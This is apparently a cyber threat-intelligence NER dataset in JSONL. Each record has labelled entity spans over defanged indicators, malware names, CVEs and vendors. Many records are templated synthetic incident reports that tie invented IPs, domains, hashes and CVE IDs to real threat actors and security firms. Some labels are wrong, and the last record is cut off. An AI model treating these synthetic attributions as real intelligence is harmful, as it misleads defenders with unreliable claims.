{"text": "However , the C2 can send an updated list . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 . The malware then proceeds to beacon to a configured remote server of cswksfwq[ . ]kfesv[ . ]xyz on TCP port 8080 . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"Indicator: cswksfwq.kfesv.xyz": [[202, 228]], "Organization: Bradshaw": [[253, 261]], "Organization: he and his then - girlfriend": [[291, 319]]}, "info": {"id": "cyberner_stix_train_001948", "source": "defanged_augment"}}
{"text": "The actor sends an email to trala[ . ]cosh2@post[ . ]cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload .", "spans": {"Indicator: trala.cosh2@post.cz": [[28, 55]], "Malware: Cannon": [[129, 135]], "Malware: Trojan": [[136, 142]]}, "info": {"id": "cyberner_stix_train_004421", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncxl/mbox: validate payload size before accessing contents in cxl_payload_from_user_allowed()\n\ncxl_payload_from_user_allowed() casts and dereferences the input\npayload without first verifying its size. When a raw mailbox command\nis sent with an undersized payload (ie: 1 byte for CXL_MBOX_OP_CLEAR_LOG,\nwhich expects a 16-byte UUID), uuid_equal() reads past the allocated buffer,\ntriggering a KASAN splat:\n\nBUG: KASAN: slab-out-of-bounds in memcmp+0x176/0x1d0 lib/string.c:683\nRead of size 8 at addr ffff88810130f5c0 by task syz.1.62/2258\n\nCPU: 2 UID: 0 PID: 2258 Comm: syz.1.62 Not tainted 6.19.0-dirty #3 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]17[.]0-0-gb52ca86e094d-prebuilt[.]qemu[.]org 04/01/2014\nCall Trace:\n <TASK>\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0xab/0xe0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xce/0x650 mm/kasan/report.c:482\n kasan_report+0xce/0x100 mm/kasan/report.c:595\n memcmp+0x176/0x1d0 lib/string.c:683\n uuid_equal include/linux/uuid.h:73 [inline]\n cxl_payload_from_user_allowed drivers/cxl/core/mbox.c:345 [inline]\n cxl_mbox_cmd_ctor drivers/cxl/core/mbox.c:368 [inline]\n cxl_validate_cmd_from_user drivers/cxl/core/mbox.c:522 [inline]\n cxl_send_cmd+0x9c0/0xb50 drivers/cxl/core/mbox.c:643\n __cxl_memdev_ioctl drivers/cxl/core/memdev.c:698 [inline]\n cxl_memdev_ioctl+0x14f/0x190 drivers/cxl/core/memdev.c:713\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xa8/0x330 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7fdaf331ba79\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fdaf1d77038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007fdaf3585fa0 RCX: 00007fdaf331ba79\nRDX: 00002000000001c0 RSI: 00000000c030ce02 RDI: 0000000000000003\nRBP: 00007fdaf33749df R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007fdaf3586038 R14: 00007fdaf3585fa0 R15: 00007ffced2af768\n </TASK>\n\nAdd 'in_size' parameter to cxl_payload_from_user_allowed() and validate\nthe payload is large enough.", "spans": {"Indicator: rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org": [[751, 803]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[709, 713]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-23327"}}
{"text": "Blog Post by Volexity: Tracking Flax Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from noreply@auth-check[.]org delivering BatLoader. Post-compromise, the attackers deploy Qbot and use Certutil for reconnaissance. C2 infrastructure includes 172[.]203[.]244[.]108 and cacheproxy[ . ]dev. A staging server at hxxps://relay-node[ . ]com/wp-content/uploads/doc.php hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\shell.php (MD5: ff7db5eeadfae91a09a64659eb7107ad).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2020-24628": [[124, 138]], "System: F5 BIG-IP": [[147, 156]], "Indicator: noreply@auth-check.org": [[232, 256]], "Malware: BatLoader": [[268, 277]], "Malware: Qbot": [[317, 321]], "Indicator: 172.203.244.108": [[386, 407]], "Indicator: cacheproxy.dev": [[412, 430]], "Indicator: https://relay-node.com/wp-content/uploads/doc.php": [[452, 505]], "Indicator: ff7db5eeadfae91a09a64659eb7107ad": [[588, 620]]}, "info": {"id": "synth_v2_01615", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Palo Alto Unit 42 identified a large-scale phishing operation. Emails originated from it@login-portal[.]tech and info@secure-verify[.]net, spoofing legitimate services. Victims were directed to hxxp://mail-edge[ . ]xyz/login which hosted a credential harvesting page on loginauth[.]io. A secondary link hxxp://proxycloud[ . ]cc/collect delivered Lumma Stealer (SHA1: b7f7faea666f9b7b21dbbd124a8f7d5e5a9f3c8d). The malware was saved to /home/user/.config/payload.bin and established C2 with 156 [ . ] 119 [ . ] 242 [ . ] 105.", "spans": {"Organization: Palo Alto Unit 42": [[26, 43]], "Indicator: it@login-portal.tech": [[112, 134]], "Indicator: info@secure-verify.net": [[139, 163]], "Indicator: hxxp://mail-edge.xyz/login": [[220, 250]], "Indicator: loginauth.io": [[296, 310]], "Indicator: http://proxycloud.cc/collect": [[329, 361]], "Malware: Lumma Stealer": [[372, 385]], "Indicator: b7f7faea666f9b7b21dbbd124a8f7d5e5a9f3c8d": [[393, 433]], "Indicator: 156.119.242.105": [[516, 549]]}, "info": {"id": "synth_v2_01098", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. The `tf.raw_ops.Conv3DBackprop*` operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0. This is because the implementation(hxxps://github[ . ]com/tensorflow/tensorflow/blob/a91bb59769f19146d5a0c20060244378e878f140/tensorflow/core/kernels/conv_grad_ops_3d.cc#L430-L450) does not check that the divisor used in computing the shard size is not zero. Thus, if attacker controls the input sizes, they can trigger a denial of service via a division by zero error. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/a91bb59769f19146d5a0c20060244378e878f140/tensorflow/core/kernels/conv_grad_ops_3d.cc#L430-L450": [[252, 396]], "Vulnerability: denial of service": [[539, 556]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29522"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 162 [ . ] 20 [ . ] 134, the Check Point Research IR team identified PlugX running as C:\\Users\\admin\\Desktop\\loader.exe. The threat actor, believed to be Aqua Blizzard, used Mythic for credential harvesting and Hashcat for lateral movement. Exfiltrated data was sent to storagedata[ . ]xyz and data-data[.]cc. The initial dropper (MD5: c9d4fbb81665eda7221f0d026f030894) was delivered via a phishing email from admin@secure-verify[.]net. A second C2 node was observed at 166[.]147[.]12[.]59, with a persistence mechanism writing to /opt/app/bin/config.dat.", "spans": {"Indicator: 172.162.20.134": [[64, 96]], "Organization: Check Point Research": [[102, 122]], "Malware: PlugX": [[142, 147]], "Indicator: storagedata.xyz": [[343, 362]], "Indicator: data-data.cc": [[367, 381]], "Indicator: c9d4fbb81665eda7221f0d026f030894": [[409, 441]], "Indicator: admin@secure-verify.net": [[483, 508]], "Indicator: 166.147.12.59": [[543, 562]]}, "info": {"id": "synth_v2_00320", "source": "defanged_augment"}}
{"text": "A backdoor also known as: TrojanDownloader.Tandfuy Trojan.Symmi.DA610 BehavesLike[ . ]Win32[ . ]Dropper[ . ]lt Trojan-Downloader.Win32.Tandfuy W32/Trojan.ZKSQ-8249 TR/Bipamid.dnrhz TrojanDownloader:Win32/Tandfuy.B Trojan/Win32.AVKill.R107811 Trj/GdSda.A Win32/Bipamid.C", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Dropper.lt": [[70, 110]]}, "info": {"id": "cyner2_train_003950", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-23934 is a critical deserialization flaw affecting Active Directory. Dragos confirmed active exploitation by Forest Blizzard in the wild. Exploitation delivers Latrodectus (SHA1: e44dcf22967b3149e6b8edffb8972530d2749634) which is dropped to C:\\Users\\Public\\Documents\\svchost.exe. The exploit payload is hosted at hxxp://proxy-static[.]cc/gate.php and communicates to 192[.]107[.]185[.]177 for C2.", "spans": {"Vulnerability: CVE-2024-23934": [[24, 38]], "Vulnerability: deserialization flaw": [[53, 73]], "System: Active Directory": [[84, 100]], "Organization: Dragos": [[102, 108]], "Malware: Latrodectus": [[193, 204]], "Indicator: e44dcf22967b3149e6b8edffb8972530d2749634": [[212, 252]], "Indicator: hxxp://proxy-static.cc/gate.php": [[346, 379]], "Indicator: 192.107.185.177": [[400, 421]]}, "info": {"id": "synth_v2_00765", "source": "defanged_augment"}}
{"text": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat[.]io.", "spans": {"Indicator: jrat.io": [[325, 334]], "Malware: jRAT": [[0, 4], [279, 283]], "Malware: Jacksbot": [[20, 28]], "System: Java": [[64, 68]], "System: macOS": [[89, 94]], "System: Windows": [[103, 110]], "System: Linux": [[96, 101]], "Vulnerability: DDoS": [[172, 176]]}, "info": {"source": "defanged_augment", "name": "jRAT"}}
{"text": "keypair is a a RSA PEM key generator written in javascript. keypair implements a lot of cryptographic primitives on its own or by borrowing from other libraries where possible, including node-forge. An issue was discovered where this library was generating identical RSA keys used in SSH. This would mean that the library is generating identical P, Q (and thus N) values which, in practical terms, is impossible with RSA-2048 keys. Generating identical values, repeatedly, usually indicates an issue with poor random number generation, or, poor handling of CSPRNG output. Issue 1: Poor random number generation (`GHSL-2021-1012`). The library does not rely entirely on a platform provided CSPRNG, rather, it uses it's own counter-based CMAC approach. Where things go wrong is seeding the CMAC implementation with \"true\" random data in the function `defaultSeedFile`. In order to seed the AES-CMAC generator, the library will take two different approaches depending on the JavaScript execution environment. In a browser, the library will use [`window.crypto.getRandomValues()`](hxxps://github[.]com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971). However, in a nodeJS execution environment, the `window` object is not defined, so it goes down a much less secure solution, also of which has a bug in it. It does look like the library tries to use node's CSPRNG when possible unfortunately, it looks like the `crypto` object is null because a variable was declared with the same name, and set to `null`. So the node CSPRNG path is never taken. However, when `window.crypto.getRandomValues()` is not available, a Lehmer LCG random number generator is used to seed the CMAC counter, and the LCG is seeded with `Math.random`. While this is poor and would likely qualify in a security bug in itself, it does not explain the extreme frequency in which duplicate keys occur. The main flaw: The output from the Lehmer LCG is encoded incorrectly. The specific [line][hxxps://github[ . ]com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008] with the flaw is: `b.putByte(String.fromCharCode(next & 0xFF))` The [definition](hxxps://github[.]com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352) of `putByte` is `util.ByteBuffer.prototype.putByte = function(b) {this.data += String.fromCharCode(b);};`. Simplified, this is `String.fromCharCode(String.fromCharCode(next & 0xFF))`. The double `String.fromCharCode` is almost certainly unintentional and the source of weak seeding. Unfortunately, this does not result in an error. Rather, it results most of the buffer containing zeros. Since we are masking with 0xFF, we can determine that 97% of the output from the LCG are converted to zeros. The only outputs that result in meaningful values are outputs 48 through 57, inclusive. The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9. In summary, there are three immediate concerns: 1. The library has an insecure random number fallback path. Ideally the library would require a strong CSPRNG instead of attempting to use a LCG and `Math.random`. 2. The library does not correctly use a strong random number generator when run in NodeJS, even though a strong CSPRNG is available. 3. The fallback path has an issue in the implementation where a majority of the seed data is going to effectively be zero. Due to the poor random number generation, keypair generates RSA keys that are relatively easy to guess. This could enable an attacker to decrypt confidential messages or gain authorized access to an account belonging to the victim.", "spans": {"Indicator: https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971": [[1077, 1178]], "Indicator: https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008]": [[1991, 2096]], "Indicator: https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352": [[2178, 2284]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-41117"}}
{"text": "TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127 [ . ] 0 [ . ] 0 [ . ] 1 , which is a variation of a technique known as \" parking \" .", "spans": {"Indicator: 127.0.0.1": [[94, 121]]}, "info": {"id": "cyberner_stix_train_002423", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 26 [ . ] 194 [ . ] 105, the Dragos IR team identified LockBit running as /usr/local/bin/csrss.exe. The threat actor, believed to be Storm-0558, used Mimikatz for credential harvesting and ADFind for lateral movement. Exfiltrated data was sent to proxycdn[.]io and cdnbackup[.]net. The initial dropper (SHA1: 931d2b1b337ec916c0bfdb69ce322c130ae6a1a8) was delivered via a phishing email from helpdesk@auth-check[ . ]org. A second C2 node was observed at 180[.]118[.]113[.]87, with a persistence mechanism writing to /usr/local/bin/csrss.exe.", "spans": {"Indicator: 10.26.194.105": [[64, 95]], "Organization: Dragos": [[101, 107]], "Malware: LockBit": [[127, 134]], "Indicator: proxycdn.io": [[319, 332]], "Indicator: cdnbackup.net": [[337, 352]], "Indicator: 931d2b1b337ec916c0bfdb69ce322c130ae6a1a8": [[381, 421]], "Indicator: helpdesk@auth-check.org": [[463, 490]], "Indicator: 180.118.113.87": [[525, 545]]}, "info": {"id": "synth_v2_00351", "source": "defanged_augment"}}
{"text": "Red Alert 2.0 IoCs list C2 addresses 103[.]239[.]30[.]126:7878 146 [ . ] 185 [ . ] 241 [ . ] 29:7878 146 [ . ] 185 [ . ] 241 [ . ] 42:7878 185[.]126[.]200[.]3:7878 185[.]126[.]200[.]12:7878 185 [ . ] 126 [ . ] 200 [ . ] 15:7878 185[.]126[.]200[.]18:7878 185 [ . ] 165 [ . ] 28 [ . ] 15:7878 185[.]243[.]243[.]241:7878 185 [ . ] 243 [ . ] 243 [ . ] 244:7878 185 [ . ] 243 [ . ] 243 [ . ] 245:7878 Domains Malware source Web hosts", "spans": {"Malware: Red Alert 2.0": [[0, 13]], "Indicator: 103.239.30.126": [[37, 57]], "Indicator: 146.185.241.29": [[63, 95]], "Indicator: 146.185.241.42": [[101, 133]], "Indicator: 185.126.200.3": [[139, 158]], "Indicator: 185.126.200.12": [[164, 184]], "Indicator: 185.126.200.15": [[190, 222]], "Indicator: 185.126.200.18": [[228, 248]], "Indicator: 185.165.28.15": [[254, 285]], "Indicator: 185.243.243.241": [[291, 312]], "Indicator: 185.243.243.244": [[318, 351]], "Indicator: 185.243.243.245": [[357, 390]]}, "info": {"id": "cyner_train_000258", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-31252 is a critical use-after-free affecting Palo Alto PAN-OS. Secureworks confirmed active exploitation by MuddyWater in the wild. Exploitation delivers Conti (MD5: 79c0570fefe4c222f367eb4e443e6786) which is dropped to /dev/shm/loader.exe. The exploit payload is hosted at hxxps://dataauth[ . ]dev/login and communicates to 172 [ . ] 211 [ . ] 112 [ . ] 169 for C2.", "spans": {"Vulnerability: CVE-2024-31252": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: Palo Alto PAN-OS": [[78, 94]], "Organization: Secureworks": [[96, 107]], "Malware: Conti": [[187, 192]], "Indicator: 79c0570fefe4c222f367eb4e443e6786": [[199, 231]], "Indicator: hxxps://dataauth.dev/login": [[307, 337]], "Indicator: 172.211.112.169": [[358, 391]]}, "info": {"id": "synth_v2_00824", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]247[.]117[.]115, the Microsoft MSRC IR team identified FormBook running as C:\\Users\\Public\\Documents\\chrome_helper.exe. The threat actor, believed to be BlackTech, used Impacket for credential harvesting and Chisel for lateral movement. Exfiltrated data was sent to cachelogin[.]cc and backupstorage[ . ]tech. The initial dropper (SHA1: c363c62d1d740381be1f3d0b5b172d59e5119af3) was delivered via a phishing email from notification@credential-check[.]site. A second C2 node was observed at 59 [ . ] 64 [ . ] 125 [ . ] 199, with a persistence mechanism writing to C:\\Program Files\\Common Files\\ntds.dit.", "spans": {"Indicator: 172.247.117.115": [[64, 85]], "Organization: Microsoft MSRC": [[91, 105]], "Malware: FormBook": [[125, 133]], "Indicator: cachelogin.cc": [[336, 351]], "Indicator: backupstorage.tech": [[356, 378]], "Indicator: c363c62d1d740381be1f3d0b5b172d59e5119af3": [[407, 447]], "Indicator: notification@credential-check.site": [[489, 525]], "Indicator: 59.64.125.199": [[560, 591]]}, "info": {"id": "synth_v2_00425", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Joke/W32.BadJoke.230912 Hoax.Fakedel JokeTool.RJLSoftware Aplicacion/FakeDel.c W32/Joke[.]BE Joke.FakeDel JOKE_FAKEDEL.C Win.Joke.FakeDelete-1 Hoax.Win32.BadJoke.FakeDel.c Riskware.Win32.FakeDel.hsrd Hoax.W32.BadJoke.FakeDel.c!c Joke.Fakedel Tool.BadJoke.Win32.441 JOKE_FAKEDEL.C not-a-virus:BadJoke.Win32.FakeDel.b W32/Joke.HLOW-7548 Hoax.BadJoke.FakeDel.a Joke:Win32/Fakedel.C JOKE/FakeDel.C HackTool[Hoax]/Win32.FakeDel Joke:Win32/Fakedel.C Hoax.Win32.BadJoke.FakeDel.c BadJoke.Win32.FakeDel.c Joke/Fakedel.D Win32.Trojan-psw.Badjoke.Svrk Trojan.BadJoke!Ig2iP/M1kgM Win32/Joke.309", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Joke.BE": [[109, 118]]}, "info": {"id": "cyner2_train_006426", "source": "defanged_augment"}}
{"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface[ . ]xls and XLS-withyourface – test[.]xls .", "spans": {"Organization: Group-IB": [[0, 8]], "Malware: malicious Microsoft Word attachment": [[70, 105]], "Indicator: XLS-withyourface.xls": [[282, 306]], "Indicator: XLS-withyourface – test.xls": [[311, 340]]}, "info": {"id": "cyberner_stix_train_005542", "source": "defanged_augment"}}
{"text": "NSA published a threat intelligence report linking Salt Typhoon to a new campaign exploiting CVE-2023-16619 in Active Directory. The attackers deployed NjRAT via Impacket, establishing C2 communication with 55[.]67[.]242[.]63 and gateway-mail[ . ]site. A secondary payload was downloaded from hxxps://relaycdn[ . ]top/login. The malware binary (MD5: 67e8d86f5cedfc3d30443604f6492700) was dropped to /opt/app/bin/taskhost.exe. Phishing emails were sent from helpdesk@login-portal[.]tech targeting enterprise users. A backup C2 server was identified at 207[.]208[.]97[.]25.", "spans": {"Organization: NSA": [[0, 3]], "Vulnerability: CVE-2023-16619": [[93, 107]], "System: Active Directory": [[111, 127]], "Malware: NjRAT": [[152, 157]], "Indicator: 55.67.242.63": [[207, 225]], "Indicator: gateway-mail.site": [[230, 251]], "Indicator: hxxps://relaycdn.top/login": [[293, 323]], "Indicator: 67e8d86f5cedfc3d30443604f6492700": [[350, 382]], "Indicator: helpdesk@login-portal.tech": [[457, 485]], "Indicator: 207.208.97.25": [[551, 570]]}, "info": {"id": "synth_v2_00003", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Ligolo artifacts at /etc/cron.d/csrss.exe. Memory dump analysis confirmed execution of Mythic. Registry modifications pointed to persistence via /dev/shm/runtime.dll. Network forensics identified connections to 192[.]146[.]23[.]43 and backup-backup[.]link. Email headers traced the initial vector to service@account-update[.]xyz. File C:\\Windows\\Tasks\\taskhost.exe (SHA256: 1ff87a3242603df5ce3ddba89cc5f2f31079c78864870f82fc55c1c768413c65) was identified as the initial dropper. A staging URL hxxp://gatewaycloud[ . ]club/login resolved to 10[.]147[.]194[.]247. Secondary artifact hash: SHA1: 24190d58ef6ef86fbaa35fd3ea497f19b60589e8.", "spans": {"Indicator: 192.146.23.43": [[283, 302]], "Indicator: backup-backup.link": [[307, 327]], "Indicator: service@account-update.xyz": [[372, 400]], "Indicator: 1ff87a3242603df5ce3ddba89cc5f2f31079c78864870f82fc55c1c768413c65": [[446, 510]], "Indicator: hxxp://gatewaycloud.club/login": [[565, 599]], "Indicator: 10.147.194.247": [[612, 632]], "Indicator: 24190d58ef6ef86fbaa35fd3ea497f19b60589e8": [[665, 705]]}, "info": {"id": "synth_v2_01123", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2023-46500 is a critical type confusion affecting Ubuntu 22.04. Rapid7 confirmed active exploitation by Flax Typhoon in the wild. Exploitation delivers TrickBot (SHA256: ee0508d79eda99bc7532b2fab948d2a2783d945d49b281c83991cb91779ec170) which is dropped to C:\\Windows\\System32\\ntds.dit. The exploit payload is hosted at hxxp://datadata[ . ]site/secure/token and communicates to 192 [ . ] 146 [ . ] 55 [ . ] 139 for C2.", "spans": {"Vulnerability: CVE-2023-46500": [[24, 38]], "Vulnerability: type confusion": [[53, 67]], "System: Ubuntu 22.04": [[78, 90]], "Organization: Rapid7": [[92, 98]], "Malware: TrickBot": [[180, 188]], "Indicator: ee0508d79eda99bc7532b2fab948d2a2783d945d49b281c83991cb91779ec170": [[198, 262]], "Indicator: http://datadata.site/secure/token": [[347, 384]], "Indicator: 192.146.55.139": [[405, 437]]}, "info": {"id": "synth_v2_00661", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 Virus/W32.Sality.D Worm.Dumpy.S19687 Win32.Sality.3 Virus.Sality.Win32.25 Win32.Sality.3 Win32.Sality.3 W32.Sality.AE Win32/Sality.AA PE_SALITY.RL Trojan-Ransom.Win32.Blocker.gfeq Virus.Win32.Sality.beygb Win32.Sality.3 Win32.Sality.3 Win32.Sector.30 BehavesLike.Win32.Sality.cm Win32/HLLP.Kuku.poly2 W32/Sality[ . ]AT Worm:Win32/Dumpy.B Trojan-Ransom.Win32.Blocker.gfeq Win32.Virus.Sality.A HEUR/Fakon.mwf Virus.Win32.Sality.bakc Worm.AutoRun W32/Sality.AA Win32.Sality Win32/Sality.NBA Trojan-Ransom.Win32.Blocker.b Win32.Sality.BL Worm.Win32.Dumpy Virus.Win32.Sality.I", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Sality.AT": [[360, 373]]}, "info": {"id": "cyner2_train_006069", "source": "defanged_augment"}}
{"text": "Blog Post by Dragos: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-45005 against Ubuntu 22.04 deployments. The initial access vector involves spear-phishing emails from service@account-update[.]xyz delivering PikaBot. Post-compromise, the attackers deploy Qbot and use Mimikatz for reconnaissance. C2 infrastructure includes 202[.]163[.]249[.]139 and data-relay[ . ]xyz. A staging server at hxxp://backup-secure[.]net/admin/config hosts additional tooling. Key artifact: /usr/local/bin/beacon.dll (MD5: 15cc660ae2c71df3dad5530a440cd9ec).", "spans": {"Organization: Dragos": [[13, 19]], "Vulnerability: CVE-2023-45005": [[123, 137]], "System: Ubuntu 22.04": [[146, 158]], "Indicator: service@account-update.xyz": [[234, 262]], "Malware: PikaBot": [[274, 281]], "Malware: Qbot": [[321, 325]], "Indicator: 202.163.249.139": [[390, 411]], "Indicator: data-relay.xyz": [[416, 434]], "Indicator: http://backup-secure.net/admin/config": [[456, 495]], "Indicator: 15cc660ae2c71df3dad5530a440cd9ec": [[568, 600]]}, "info": {"id": "synth_v2_01663", "source": "defanged_augment"}}
{"text": "Artifact Analysis for RedLine Stealer campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\helper.sh - SHA1: afbf4afad2e0896a7a492e61c56d5297f2c63845\nStage 2 loader at /dev/shm/sam.hive - SHA256: e84a3b7ceea13a82300c89cba3314bea18626113e959556ab27b5b64a287255b\nFinal payload at /tmp/helper.sh - MD5: 31ca3b8e0d1dd4218c4bdde7b6a65c8a\nExfiltration module - SHA256: 838b706f2a80971e26961eef2a91eefa4d90434c49f2a8c970f70809b552ae93\nAll stages communicated with 10 [ . ] 174 [ . ] 96 [ . ] 248. Rubeus signatures detected in Stage 2.", "spans": {"Malware: RedLine Stealer": [[22, 37]], "Indicator: afbf4afad2e0896a7a492e61c56d5297f2c63845": [[110, 150]], "Indicator: e84a3b7ceea13a82300c89cba3314bea18626113e959556ab27b5b64a287255b": [[197, 261]], "Indicator: 31ca3b8e0d1dd4218c4bdde7b6a65c8a": [[301, 333]], "Indicator: 838b706f2a80971e26961eef2a91eefa4d90434c49f2a8c970f70809b552ae93": [[364, 428]], "Indicator: 10.174.96.248": [[458, 489]]}, "info": {"id": "synth_v2_01932", "source": "defanged_augment"}}
{"text": "PLATINUM has used several zero-day exploits against their victims . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit[ . ]MSWord[ . ]CVE-2010-333 , Exploit[.]Win32[.]CVE-2012-0158 .", "spans": {"Vulnerability: zero-day exploits": [[26, 43]], "Organization: Kaspersky Lab": [[68, 81]], "Organization: Microsoft Office": [[105, 121]], "Vulnerability: exploits": [[122, 130]], "Indicator: Exploit.MSWord.CVE-2010-333": [[178, 213]], "Indicator: Exploit.Win32.CVE-2012-0158": [[216, 247]]}, "info": {"id": "cyberner_stix_train_003244", "source": "defanged_augment"}}
{"text": "An unsafe default configuration in KNIME Analytics Platform before 5.2.0 allows for a cross-site scripting attack. When KNIME Analytics Platform is used as an executor for either KNIME Server or KNIME Business Hub several JavaScript-based view nodes do not sanitize the data that is displayed by default. If the data to be displayed contains JavaScript this code is executed in the browser and can perform any operations that the current user is allowed to perform silently.\n\n\n\n\nKNIME Analytics Platform already has configuration options with which sanitization of data can be actived, see  hxxps://docs[.]knime[.]com/latest/webportal_admin_guide/index.html#html-sanitization-webportal hxxps://docs[.]knime[.]com/latest/webportal_admin_guide/index.html#html-sanitization-webportal . However, these are off by default which allows for cross-site scripting attacks.\n\n\nKNIME Analytics Platform 5.2.0 will enable sanitization by default. For all previous releases we recommend users to add the corresponding settings to the executor's knime.ini.", "spans": {"Indicator: https://docs.knime.com/latest/webportal_admin_guide/index.html#html-sanitization-webportal": [[591, 685], [686, 780]], "Vulnerability: cross-site scripting": [[86, 106], [834, 854]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-5562"}}
{"text": "Blog Post by Volexity: Tracking Ember Bear's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-34911 against Zyxel USG deployments. The initial access vector involves spear-phishing emails from it@mail-service[ . ]info delivering Cobalt Strike. Post-compromise, the attackers deploy Amadey and use LaZagne for reconnaissance. C2 infrastructure includes 127[.]168[.]83[.]180 and static-cache[ . ]cc. A staging server at hxxps://cloudportal[ . ]cc/panel/index.html hosts additional tooling. Key artifact: /usr/local/bin/taskhost.exe (MD5: a7f5198a88f102acbd79016294f39965).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2023-34911": [[122, 136]], "System: Zyxel USG": [[145, 154]], "Indicator: it@mail-service.info": [[230, 254]], "Malware: Cobalt Strike": [[266, 279]], "Malware: Amadey": [[319, 325]], "Indicator: 127.168.83.180": [[389, 409]], "Indicator: static-cache.cc": [[414, 433]], "Indicator: hxxps://cloudportal.cc/panel/index.html": [[455, 498]], "Indicator: a7f5198a88f102acbd79016294f39965": [[573, 605]]}, "info": {"id": "synth_v2_01681", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Microsoft MSRC identified a large-scale phishing operation. Emails originated from hr@document-share[ . ]link and service@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxp://update-static[ . ]live/download/update.exe which hosted a credential harvesting page on gateway-api[.]site. A secondary link hxxps://portal-auth[.]com/collect delivered Vidar (SHA256: ab0f4d1f456f257fe6dce53c120f65d48393c9fdd6aebee8f6b191a6009ca746). The malware was saved to C:\\Users\\Public\\Documents\\ntds.dit and established C2 with 92[.]163[.]230[.]176.", "spans": {"Organization: Microsoft MSRC": [[26, 40]], "Indicator: hr@document-share.link": [[109, 135]], "Indicator: service@login-portal.tech": [[140, 167]], "Indicator: http://update-static.live/download/update.exe": [[224, 273]], "Indicator: gateway-api.site": [[319, 337]], "Indicator: hxxps://portal-auth.com/collect": [[356, 389]], "Malware: Vidar": [[400, 405]], "Indicator: 